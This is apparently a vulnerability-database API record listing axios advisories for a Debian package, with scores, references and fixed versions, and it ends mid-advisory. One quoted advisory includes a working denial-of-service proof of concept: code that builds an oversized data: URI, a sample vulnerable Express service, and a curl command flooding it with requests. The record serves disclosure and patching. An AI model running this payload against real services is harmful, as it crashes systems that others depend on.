{"url":"http://public2.vulnerablecode.io/api/packages/932079?format=json","purl":"pkg:deb/debian/node-axios@1.2.1%2Bdfsg-1%2Bdeb12u1?distro=trixie","type":"deb","namespace":"debian","name":"node-axios","version":"1.2.1+dfsg-1+deb12u1","qualifiers":{"distro":"trixie"},"subpath":"","is_vulnerable":true,"next_non_vulnerable_version":"1.6.2+dfsg-1","latest_non_vulnerable_version":"1.15.2-1","affected_by_vulnerabilities":[{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/354606?format=json","vulnerability_id":"VCID-671j-k4zn-xbgk","summary":"Axios is a promise based HTTP client for the browser and Node.js. Prior to 1.15.1 and 0.31.1, the fix for the no_proxy hostname normalization bypass is incomplete. When no_proxy=localhost is set, requests to 127.0.0.1 and [::1] still route through the proxy instead of bypassing it. The shouldBypassProxy() function does pure string matching — it does not resolve IP aliases or loopback equivalents. This vulnerability is fixed in 1.15.1 and 0.31.1.","references":[{"reference_url":"https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2026-42038.json","reference_id":"","reference_type":"","scores":[{"value":"6.8","scoring_system":"cvssv3","scoring_elements":"CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:C/C:H/I:N/A:N"}],"url":"https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2026-42038.json"},{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2026-42038","reference_id":"","reference_type":"","scores":[{"value":"0.00032","scoring_system":"epss","scoring_elements":"0.09121","published_at":"2026-04-26T12:55:00Z"},{"value":"0.00033","scoring_system":"epss","scoring_elements":"0.09672","published_at":"2026-04-29T12:55:00Z"},{"value":"0.00044","scoring_system":"epss","scoring_elements":"0.13132","published_at":"2026-05-05T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2026-42038"},{"reference_url":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-42038","reference_id":"","reference_type":"","scores":[],"url
":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-42038"},{"reference_url":"https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=1134878","reference_id":"1134878","reference_type":"","scores":[],"url":"https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=1134878"},{"reference_url":"https://bugzilla.redhat.com/show_bug.cgi?id=2461634","reference_id":"2461634","reference_type":"","scores":[],"url":"https://bugzilla.redhat.com/show_bug.cgi?id=2461634"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2026-42038","reference_id":"CVE-2026-42038","reference_type":"","scores":[],"url":"https://nvd.nist.gov/vuln/detail/CVE-2026-42038"},{"reference_url":"https://github.com/advisories/GHSA-m7pr-hjqh-92cm","reference_id":"GHSA-m7pr-hjqh-92cm","reference_type":"","scores":[{"value":"MODERATE","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-m7pr-hjqh-92cm"},{"reference_url":"https://github.com/axios/axios/security/advisories/GHSA-m7pr-hjqh-92cm","reference_id":"GHSA-m7pr-hjqh-92cm","reference_type":"","scores":[{"value":"6.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:C/C:H/I:N/A:N"},{"value":"MODERATE","scoring_system":"cvssv3.1_qr","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:P/A:N/T:P/P:M/B:A/M:M/D:T/2026-04-27T13:46:29Z/"}],"url":"https://github.com/axios/axios/security/advisories/GHSA-m7pr-hjqh-92cm"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/1077457?format=json","purl":"pkg:deb/debian/node-axios@1.15.2-1?distro=trixie","is_vulnerable":false,"affected_by_vulnerabilities":[],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:deb/debian/node-axios@1.15.2-1%3Fdistro=trixie"}],"aliases":["CVE-2026-42038","GHSA-m7pr-hjqh-92cm"],"risk_score":3.0,"exploitability":"0.5","weighted_severity":"6.1","resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-671j-k4zn-xbgk"},{"url":"http://publi
c2.vulnerablecode.io/api/vulnerabilities/354421?format=json","vulnerability_id":"VCID-8352-4tud-y3f4","summary":"Axios is a promise based HTTP client for the browser and Node.js. Prior to 1.15.1 and 0.31.1, when Object.prototype has been polluted by any co-dependency with keys that axios reads without a hasOwnProperty guard, an attacker can (a) silently intercept and modify every JSON response before the application sees it, or (b) fully hijack the underlying HTTP transport, gaining access to request credentials, headers, and body. The precondition is prototype pollution from a separate source in the same process. This vulnerability is fixed in 1.15.1 and 0.31.1.","references":[{"reference_url":"https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2026-42033.json","reference_id":"","reference_type":"","scores":[{"value":"7.4","scoring_system":"cvssv3","scoring_elements":"CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:N"}],"url":"https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2026-42033.json"},{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2026-42033","reference_id":"","reference_type":"","scores":[{"value":"0.00033","scoring_system":"epss","scoring_elements":"0.09688","published_at":"2026-04-26T12:55:00Z"},{"value":"0.00078","scoring_system":"epss","scoring_elements":"0.23065","published_at":"2026-04-29T12:55:00Z"},{"value":"0.00103","scoring_system":"epss","scoring_elements":"0.277","published_at":"2026-05-05T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2026-42033"},{"reference_url":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-42033","reference_id":"","reference_type":"","scores":[],"url":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-42033"},{"reference_url":"https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=1134878","reference_id":"1134878","reference_type":"","scores":[],"url":"https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=1134878"},{"reference_url":"https://bugzilla.redhat.com/show_bug.cgi?id
=2461607","reference_id":"2461607","reference_type":"","scores":[],"url":"https://bugzilla.redhat.com/show_bug.cgi?id=2461607"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2026-42033","reference_id":"CVE-2026-42033","reference_type":"","scores":[],"url":"https://nvd.nist.gov/vuln/detail/CVE-2026-42033"},{"reference_url":"https://github.com/advisories/GHSA-pf86-5x62-jrwf","reference_id":"GHSA-pf86-5x62-jrwf","reference_type":"","scores":[{"value":"HIGH","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-pf86-5x62-jrwf"},{"reference_url":"https://github.com/axios/axios/security/advisories/GHSA-pf86-5x62-jrwf","reference_id":"GHSA-pf86-5x62-jrwf","reference_type":"","scores":[{"value":"7.4","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:N"},{"value":"HIGH","scoring_system":"cvssv3.1_qr","scoring_elements":""},{"value":"Track*","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:P/A:N/T:T/P:M/B:A/M:M/D:R/2026-04-24T18:28:14Z/"}],"url":"https://github.com/axios/axios/security/advisories/GHSA-pf86-5x62-jrwf"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/1077457?format=json","purl":"pkg:deb/debian/node-axios@1.15.2-1?distro=trixie","is_vulnerable":false,"affected_by_vulnerabilities":[],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:deb/debian/node-axios@1.15.2-1%3Fdistro=trixie"}],"aliases":["CVE-2026-42033","GHSA-pf86-5x62-jrwf"],"risk_score":3.4,"exploitability":"0.5","weighted_severity":"6.7","resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-8352-4tud-y3f4"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/25655?format=json","vulnerability_id":"VCID-aq84-8cnz-byax","summary":"Axios is vulnerable to DoS attack through lack of data size check\n## Summary\n\nWhen Axios runs on Node.js and is given a URL with the `data:` scheme, it does not perform HTTP. 
Instead, its Node http adapter decodes the entire payload into memory (`Buffer`/`Blob`) and returns a synthetic 200 response.\nThis path ignores `maxContentLength` / `maxBodyLength` (which only protect HTTP responses), so an attacker can supply a very large `data:` URI and cause the process to allocate unbounded memory and crash (DoS), even if the caller requested `responseType: 'stream'`.\n\n## Details\n\nThe Node adapter (`lib/adapters/http.js`) supports the `data:` scheme. When `axios` encounters a request whose URL starts with `data:`, it does not perform an HTTP request. Instead, it calls `fromDataURI()` to decode the Base64 payload into a Buffer or Blob.\n\nRelevant code from [`[httpAdapter](https://github.com/axios/axios/blob/c959ff29013a3bc90cde3ac7ea2d9a3f9c08974b/lib/adapters/http.js#L231)`](https://github.com/axios/axios/blob/c959ff29013a3bc90cde3ac7ea2d9a3f9c08974b/lib/adapters/http.js#L231):\n\n```js\nconst fullPath = buildFullPath(config.baseURL, config.url, config.allowAbsoluteUrls);\nconst parsed = new URL(fullPath, platform.hasBrowserEnv ? platform.origin : undefined);\nconst protocol = parsed.protocol || supportedProtocols[0];\n\nif (protocol === 'data:') {\n  let convertedData;\n  if (method !== 'GET') {\n    return settle(resolve, reject, { status: 405, ... });\n  }\n  convertedData = fromDataURI(config.url, responseType === 'blob', {\n    Blob: config.env && config.env.Blob\n  });\n  return settle(resolve, reject, { data: convertedData, status: 200, ... });\n}\n```\n\nThe decoder is in [`[lib/helpers/fromDataURI.js](https://github.com/axios/axios/blob/c959ff29013a3bc90cde3ac7ea2d9a3f9c08974b/lib/helpers/fromDataURI.js#L27)`](https://github.com/axios/axios/blob/c959ff29013a3bc90cde3ac7ea2d9a3f9c08974b/lib/helpers/fromDataURI.js#L27):\n\n```js\nexport default function fromDataURI(uri, asBlob, options) {\n  ...\n  if (protocol === 'data') {\n    uri = protocol.length ? 
uri.slice(protocol.length + 1) : uri;\n    const match = DATA_URL_PATTERN.exec(uri);\n    ...\n    const body = match[3];\n    const buffer = Buffer.from(decodeURIComponent(body), isBase64 ? 'base64' : 'utf8');\n    if (asBlob) { return new _Blob([buffer], {type: mime}); }\n    return buffer;\n  }\n  throw new AxiosError('Unsupported protocol ' + protocol, ...);\n}\n```\n\n* The function decodes the entire Base64 payload into a Buffer with no size limits or sanity checks.\n* It does **not** honour `config.maxContentLength` or `config.maxBodyLength`, which only apply to HTTP streams.\n* As a result, a `data:` URI of arbitrary size can cause the Node process to allocate the entire content into memory.\n\nIn comparison, normal HTTP responses are monitored for size, the HTTP adapter accumulates the response into a buffer and will reject when `totalResponseBytes` exceeds [`[maxContentLength](https://github.com/axios/axios/blob/c959ff29013a3bc90cde3ac7ea2d9a3f9c08974b/lib/adapters/http.js#L550)`](https://github.com/axios/axios/blob/c959ff29013a3bc90cde3ac7ea2d9a3f9c08974b/lib/adapters/http.js#L550). 
No such check occurs for `data:` URIs.\n\n\n## PoC\n\n```js\nconst axios = require('axios');\n\nasync function main() {\n  // this example decodes ~120 MB\n  const base64Size = 160_000_000; // 120 MB after decoding\n  const base64 = 'A'.repeat(base64Size);\n  const uri = 'data:application/octet-stream;base64,' + base64;\n\n  console.log('Generating URI with base64 length:', base64.length);\n  const response = await axios.get(uri, {\n    responseType: 'arraybuffer'\n  });\n\n  console.log('Received bytes:', response.data.length);\n}\n\nmain().catch(err => {\n  console.error('Error:', err.message);\n});\n```\n\nRun with limited heap to force a crash:\n\n```bash\nnode --max-old-space-size=100 poc.js\n```\n\nSince Node heap is capped at 100 MB, the process terminates with an out-of-memory error:\n\n```\n<--- Last few GCs --->\n…\nFATAL ERROR: Reached heap limit Allocation failed - JavaScript heap out of memory\n1: 0x… node::Abort() …\n…\n```\n\nMini Real App PoC:\nA small link-preview service that uses axios streaming, keep-alive agents, timeouts, and a JSON body. 
It allows data: URLs which axios fully ignore `maxContentLength `, `maxBodyLength` and decodes into memory on Node before streaming enabling DoS.\n\n```js\nimport express from \"express\";\nimport morgan from \"morgan\";\nimport axios from \"axios\";\nimport http from \"node:http\";\nimport https from \"node:https\";\nimport { PassThrough } from \"node:stream\";\n\nconst keepAlive = true;\nconst httpAgent = new http.Agent({ keepAlive, maxSockets: 100 });\nconst httpsAgent = new https.Agent({ keepAlive, maxSockets: 100 });\nconst axiosClient = axios.create({\n  timeout: 10000,\n  maxRedirects: 5,\n  httpAgent, httpsAgent,\n  headers: { \"User-Agent\": \"axios-poc-link-preview/0.1 (+node)\" },\n  validateStatus: c => c >= 200 && c < 400\n});\n\nconst app = express();\nconst PORT = Number(process.env.PORT || 8081);\nconst BODY_LIMIT = process.env.MAX_CLIENT_BODY || \"50mb\";\n\napp.use(express.json({ limit: BODY_LIMIT }));\napp.use(morgan(\"combined\"));\n\napp.get(\"/healthz\", (req,res)=>res.send(\"ok\"));\n\n/**\n * POST /preview { \"url\": \"<http|https|data URL>\" }\n * Uses axios streaming but if url is data:, axios fully decodes into memory first (DoS vector).\n */\n\napp.post(\"/preview\", async (req, res) => {\n  const url = req.body?.url;\n  if (!url) return res.status(400).json({ error: \"missing url\" });\n\n  let u;\n  try { u = new URL(String(url)); } catch { return res.status(400).json({ error: \"invalid url\" }); }\n\n  // Developer allows using data:// in the allowlist\n  const allowed = new Set([\"http:\", \"https:\", \"data:\"]);\n  if (!allowed.has(u.protocol)) return res.status(400).json({ error: \"unsupported scheme\" });\n\n  const controller = new AbortController();\n  const onClose = () => controller.abort();\n  res.on(\"close\", onClose);\n\n  const before = process.memoryUsage().heapUsed;\n\n  try {\n    const r = await axiosClient.get(u.toString(), {\n      responseType: \"stream\",\n      maxContentLength: 8 * 1024, // Axios will ignore 
this for data:\n      maxBodyLength: 8 * 1024,    // Axios will ignore this for data:\n      signal: controller.signal\n    });\n\n    // stream only the first 64KB back\n    const cap = 64 * 1024;\n    let sent = 0;\n    const limiter = new PassThrough();\n    r.data.on(\"data\", (chunk) => {\n      if (sent + chunk.length > cap) { limiter.end(); r.data.destroy(); }\n      else { sent += chunk.length; limiter.write(chunk); }\n    });\n    r.data.on(\"end\", () => limiter.end());\n    r.data.on(\"error\", (e) => limiter.destroy(e));\n\n    const after = process.memoryUsage().heapUsed;\n    res.set(\"x-heap-increase-mb\", ((after - before)/1024/1024).toFixed(2));\n    limiter.pipe(res);\n  } catch (err) {\n    const after = process.memoryUsage().heapUsed;\n    res.set(\"x-heap-increase-mb\", ((after - before)/1024/1024).toFixed(2));\n    res.status(502).json({ error: String(err?.message || err) });\n  } finally {\n    res.off(\"close\", onClose);\n  }\n});\n\napp.listen(PORT, () => {\n  console.log(`axios-poc-link-preview listening on http://0.0.0.0:${PORT}`);\n  console.log(`Heap cap via NODE_OPTIONS, JSON limit via MAX_CLIENT_BODY (default ${BODY_LIMIT}).`);\n});\n```\nRun this app and send 3 post requests:\n```sh\nSIZE_MB=35 node -e 'const n=+process.env.SIZE_MB*1024*1024; const b=Buffer.alloc(n,65).toString(\"base64\"); process.stdout.write(JSON.stringify({url:\"data:application/octet-stream;base64,\"+b}))' \\\n| tee payload.json >/dev/null\nseq 1 3 | xargs -P3 -I{} curl -sS -X POST \"$URL\" -H 'Content-Type: application/json' --data-binary @payload.json -o /dev/null```\n```\n\n---\n\n## Suggestions\n\n1. **Enforce size limits**\n   For `protocol === 'data:'`, inspect the length of the Base64 payload before decoding. If `config.maxContentLength` or `config.maxBodyLength` is set, reject URIs whose payload exceeds the limit.\n\n2. 
**Stream decoding**\n   Instead of decoding the entire payload in one `Buffer.from` call, decode the Base64 string in chunks using a streaming Base64 decoder. This would allow the application to process the data incrementally and abort if it grows too large.","references":[{"reference_url":"https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2025-58754.json","reference_id":"","reference_type":"","scores":[{"value":"5.3","scoring_system":"cvssv3","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L"}],"url":"https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2025-58754.json"},{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2025-58754","reference_id":"","reference_type":"","scores":[{"value":"0.00113","scoring_system":"epss","scoring_elements":"0.29896","published_at":"2026-04-02T12:55:00Z"},{"value":"0.00113","scoring_system":"epss","scoring_elements":"0.29756","published_at":"2026-04-07T12:55:00Z"},{"value":"0.00113","scoring_system":"epss","scoring_elements":"0.29944","published_at":"2026-04-04T12:55:00Z"},{"value":"0.00144","scoring_system":"epss","scoring_elements":"0.34373","published_at":"2026-04-26T12:55:00Z"},{"value":"0.00144","scoring_system":"epss","scoring_elements":"0.34392","published_at":"2026-04-24T12:55:00Z"},{"value":"0.00144","scoring_system":"epss","scoring_elements":"0.34629","published_at":"2026-04-21T12:55:00Z"},{"value":"0.00144","scoring_system":"epss","scoring_elements":"0.34669","published_at":"2026-04-18T12:55:00Z"},{"value":"0.00144","scoring_system":"epss","scoring_elements":"0.34158","published_at":"2026-05-05T12:55:00Z"},{"value":"0.00144","scoring_system":"epss","scoring_elements":"0.34289","published_at":"2026-04-29T12:55:00Z"},{"value":"0.0015","scoring_system":"epss","scoring_elements":"0.35614","published_at":"2026-04-13T12:55:00Z"},{"value":"0.0015","scoring_system":"epss","scoring_elements":"0.35637","published_at":"2026-04-12T12:55:00Z"},{"value":"0.0015","scoring_system":"epss","scoring_el
ements":"0.3568","published_at":"2026-04-11T12:55:00Z"},{"value":"0.0015","scoring_system":"epss","scoring_elements":"0.35671","published_at":"2026-04-09T12:55:00Z"},{"value":"0.0015","scoring_system":"epss","scoring_elements":"0.35648","published_at":"2026-04-08T12:55:00Z"},{"value":"0.0015","scoring_system":"epss","scoring_elements":"0.35654","published_at":"2026-04-16T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2025-58754"},{"reference_url":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-58754","reference_id":"","reference_type":"","scores":[],"url":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-58754"},{"reference_url":"https://github.com/axios/axios","reference_id":"","reference_type":"","scores":[{"value":"7.5","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/axios/axios"},{"reference_url":"https://github.com/axios/axios/commit/945435fc51467303768202250debb8d4ae892593","reference_id":"","reference_type":"","scores":[{"value":"7.5","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:P/A:Y/T:P/P:M/B:A/M:M/D:T/2025-09-12T13:08:38Z/"}],"url":"https://github.com/axios/axios/commit/945435fc51467303768202250debb8d4ae892593"},{"reference_url":"https://github.com/axios/axios/commit/a1b1d3f073a988601583a604f5f9f5d05a3d0b67","reference_id":"","reference_type":"","scores":[{"value":"7.5","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:P/A:Y/T:P/P:M/B:A/M:M/D:T/2025-09-12T13:08:38Z/"}],"url":"https://github.com/axios/axi
os/commit/a1b1d3f073a988601583a604f5f9f5d05a3d0b67"},{"reference_url":"https://github.com/axios/axios/commit/c30252f685e8f4326722de84923fcbc8cf557f06","reference_id":"","reference_type":"","scores":[{"value":"7.5","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:P/A:Y/T:P/P:M/B:A/M:M/D:T/2025-09-12T13:08:38Z/"}],"url":"https://github.com/axios/axios/commit/c30252f685e8f4326722de84923fcbc8cf557f06"},{"reference_url":"https://github.com/axios/axios/pull/7011","reference_id":"","reference_type":"","scores":[{"value":"7.5","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:P/A:Y/T:P/P:M/B:A/M:M/D:T/2025-09-12T13:08:38Z/"}],"url":"https://github.com/axios/axios/pull/7011"},{"reference_url":"https://github.com/axios/axios/pull/7034","reference_id":"","reference_type":"","scores":[{"value":"7.5","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:P/A:Y/T:P/P:M/B:A/M:M/D:T/2025-09-12T13:08:38Z/"}],"url":"https://github.com/axios/axios/pull/7034"},{"reference_url":"https://github.com/axios/axios/releases/tag/v0.30.2","reference_id":"","reference_type":"","scores":[{"value":"7.5","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:P/A:Y/T:P/P:M/B:A/M:M/D:T/2025-09-12T13:08:38Z/"}],"url":"https://github.com/axios/axios/releases/tag/v0.30.2
"},{"reference_url":"https://github.com/axios/axios/releases/tag/v1.12.0","reference_id":"","reference_type":"","scores":[{"value":"7.5","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:P/A:Y/T:P/P:M/B:A/M:M/D:T/2025-09-12T13:08:38Z/"}],"url":"https://github.com/axios/axios/releases/tag/v1.12.0"},{"reference_url":"https://github.com/axios/axios/security/advisories/GHSA-4hjh-wcwx-xvwj","reference_id":"","reference_type":"","scores":[{"value":"7.5","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H"},{"value":"HIGH","scoring_system":"cvssv3.1_qr","scoring_elements":""},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:P/A:Y/T:P/P:M/B:A/M:M/D:T/2025-09-12T13:08:38Z/"}],"url":"https://github.com/axios/axios/security/advisories/GHSA-4hjh-wcwx-xvwj"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2025-58754","reference_id":"","reference_type":"","scores":[{"value":"7.5","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2025-58754"},{"reference_url":"https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=1114963","reference_id":"1114963","reference_type":"","scores":[],"url":"https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=1114963"},{"reference_url":"https://bugzilla.redhat.com/show_bug.cgi?id=2394735","reference_id":"2394735","reference_type":"","scores":[],"url":"https://bugzilla.redhat.com/show_bug.cgi?id=2394735"},{"reference_url":"https://github.com/advisories/GHSA-4hjh-wcwx-xvwj","reference_id":"GHSA-4hjh-wcwx-xvwj","reference_type":"","scores":[{"value":"HIGH","scoring_system":"cv
ssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-4hjh-wcwx-xvwj"},{"reference_url":"https://access.redhat.com/errata/RHSA-2025:16747","reference_id":"RHSA-2025:16747","reference_type":"","scores":[],"url":"https://access.redhat.com/errata/RHSA-2025:16747"},{"reference_url":"https://access.redhat.com/errata/RHSA-2025:18252","reference_id":"RHSA-2025:18252","reference_type":"","scores":[],"url":"https://access.redhat.com/errata/RHSA-2025:18252"},{"reference_url":"https://access.redhat.com/errata/RHSA-2025:19221","reference_id":"RHSA-2025:19221","reference_type":"","scores":[],"url":"https://access.redhat.com/errata/RHSA-2025:19221"},{"reference_url":"https://access.redhat.com/errata/RHSA-2025:19375","reference_id":"RHSA-2025:19375","reference_type":"","scores":[],"url":"https://access.redhat.com/errata/RHSA-2025:19375"},{"reference_url":"https://access.redhat.com/errata/RHSA-2025:19529","reference_id":"RHSA-2025:19529","reference_type":"","scores":[],"url":"https://access.redhat.com/errata/RHSA-2025:19529"},{"reference_url":"https://access.redhat.com/errata/RHSA-2025:19804","reference_id":"RHSA-2025:19804","reference_type":"","scores":[],"url":"https://access.redhat.com/errata/RHSA-2025:19804"},{"reference_url":"https://access.redhat.com/errata/RHSA-2025:22759","reference_id":"RHSA-2025:22759","reference_type":"","scores":[],"url":"https://access.redhat.com/errata/RHSA-2025:22759"},{"reference_url":"https://access.redhat.com/errata/RHSA-2025:23069","reference_id":"RHSA-2025:23069","reference_type":"","scores":[],"url":"https://access.redhat.com/errata/RHSA-2025:23069"},{"reference_url":"https://access.redhat.com/errata/RHSA-2025:23131","reference_id":"RHSA-2025:23131","reference_type":"","scores":[],"url":"https://access.redhat.com/errata/RHSA-2025:23131"},{"reference_url":"https://access.redhat.com/errata/RHSA-2025:23546","reference_id":"RHSA-2025:23546","reference_type":"","scores":[],"url":"https://access.redhat.com/errata/RHSA-2025:2354
6"},{"reference_url":"https://access.redhat.com/errata/RHSA-2026:1018","reference_id":"RHSA-2026:1018","reference_type":"","scores":[],"url":"https://access.redhat.com/errata/RHSA-2026:1018"},{"reference_url":"https://access.redhat.com/errata/RHSA-2026:1942","reference_id":"RHSA-2026:1942","reference_type":"","scores":[],"url":"https://access.redhat.com/errata/RHSA-2026:1942"},{"reference_url":"https://access.redhat.com/errata/RHSA-2026:4215","reference_id":"RHSA-2026:4215","reference_type":"","scores":[],"url":"https://access.redhat.com/errata/RHSA-2026:4215"},{"reference_url":"https://access.redhat.com/errata/RHSA-2026:6226","reference_id":"RHSA-2026:6226","reference_type":"","scores":[],"url":"https://access.redhat.com/errata/RHSA-2026:6226"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/932090?format=json","purl":"pkg:deb/debian/node-axios@1.12.1%2Bdfsg-1?distro=trixie","is_vulnerable":false,"affected_by_vulnerabilities":[],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:deb/debian/node-axios@1.12.1%252Bdfsg-1%3Fdistro=trixie"},{"url":"http://public2.vulnerablecode.io/api/packages/932082?format=json","purl":"pkg:deb/debian/node-axios@1.14.0%2Bdfsg-1?distro=trixie","is_vulnerable":false,"affected_by_vulnerabilities":[],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:deb/debian/node-axios@1.14.0%252Bdfsg-1%3Fdistro=trixie"},{"url":"http://public2.vulnerablecode.io/api/packages/1062504?format=json","purl":"pkg:deb/debian/node-axios@1.15.0-1?distro=trixie","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-671j-k4zn-xbgk"},{"vulnerability":"VCID-8352-4tud-y3f4"},{"vulnerability":"VCID-cj5w-7hbe-wqex"},{"vulnerability":"VCID-drqq-9mkv-qkbx"},{"vulnerability":"VCID-e86t-8z3n-sqgd"},{"vulnerability":"VCID-gtc3-vrcs-yfb9"},{"vulnerability":"VCID-nmzm-1341-jfgt"},{"vulnerability":"VCID-p78g-vmhn-yyck"},{"vulnerability":"VCID-tdwz-gg36-mkgs"},{"vulnerability":"VCID-uuzj-ta8k-c3fn"},{"vulnerabil
ity":"VCID-wbq8-z3qg-bfbt"},{"vulnerability":"VCID-z6xx-7p9v-gqc6"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:deb/debian/node-axios@1.15.0-1%3Fdistro=trixie"},{"url":"http://public2.vulnerablecode.io/api/packages/1077457?format=json","purl":"pkg:deb/debian/node-axios@1.15.2-1?distro=trixie","is_vulnerable":false,"affected_by_vulnerabilities":[],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:deb/debian/node-axios@1.15.2-1%3Fdistro=trixie"}],"aliases":["CVE-2025-58754","GHSA-4hjh-wcwx-xvwj"],"risk_score":4.0,"exploitability":"0.5","weighted_severity":"8.0","resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-aq84-8cnz-byax"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/351040?format=json","vulnerability_id":"VCID-axk7-6q4b-vuga","summary":"Axios has a NO_PROXY Hostname Normalization Bypass Leads to SSRF\nAxios does not correctly handle hostname normalization when checking `NO_PROXY` rules.\nRequests to loopback addresses like `localhost.` (with a trailing dot) or `[::1]` (IPv6 literal) skip `NO_PROXY` matching and go through the configured proxy.\n\nThis goes against what developers expect and lets attackers force requests through a proxy, even if `NO_PROXY` is set up to protect loopback or internal services.\n\nAccording to [RFC 1034 §3.1](https://datatracker.ietf.org/doc/html/rfc1034#section-3.1) and [RFC 3986 §3.2.2](https://datatracker.ietf.org/doc/html/rfc3986#section-3.2.2), a hostname can have a trailing dot to show it is a fully qualified domain name (FQDN). At the DNS level, `localhost.` is the same as `localhost`. \nHowever, Axios does a literal string comparison instead of normalizing hostnames before checking `NO_PROXY`. 
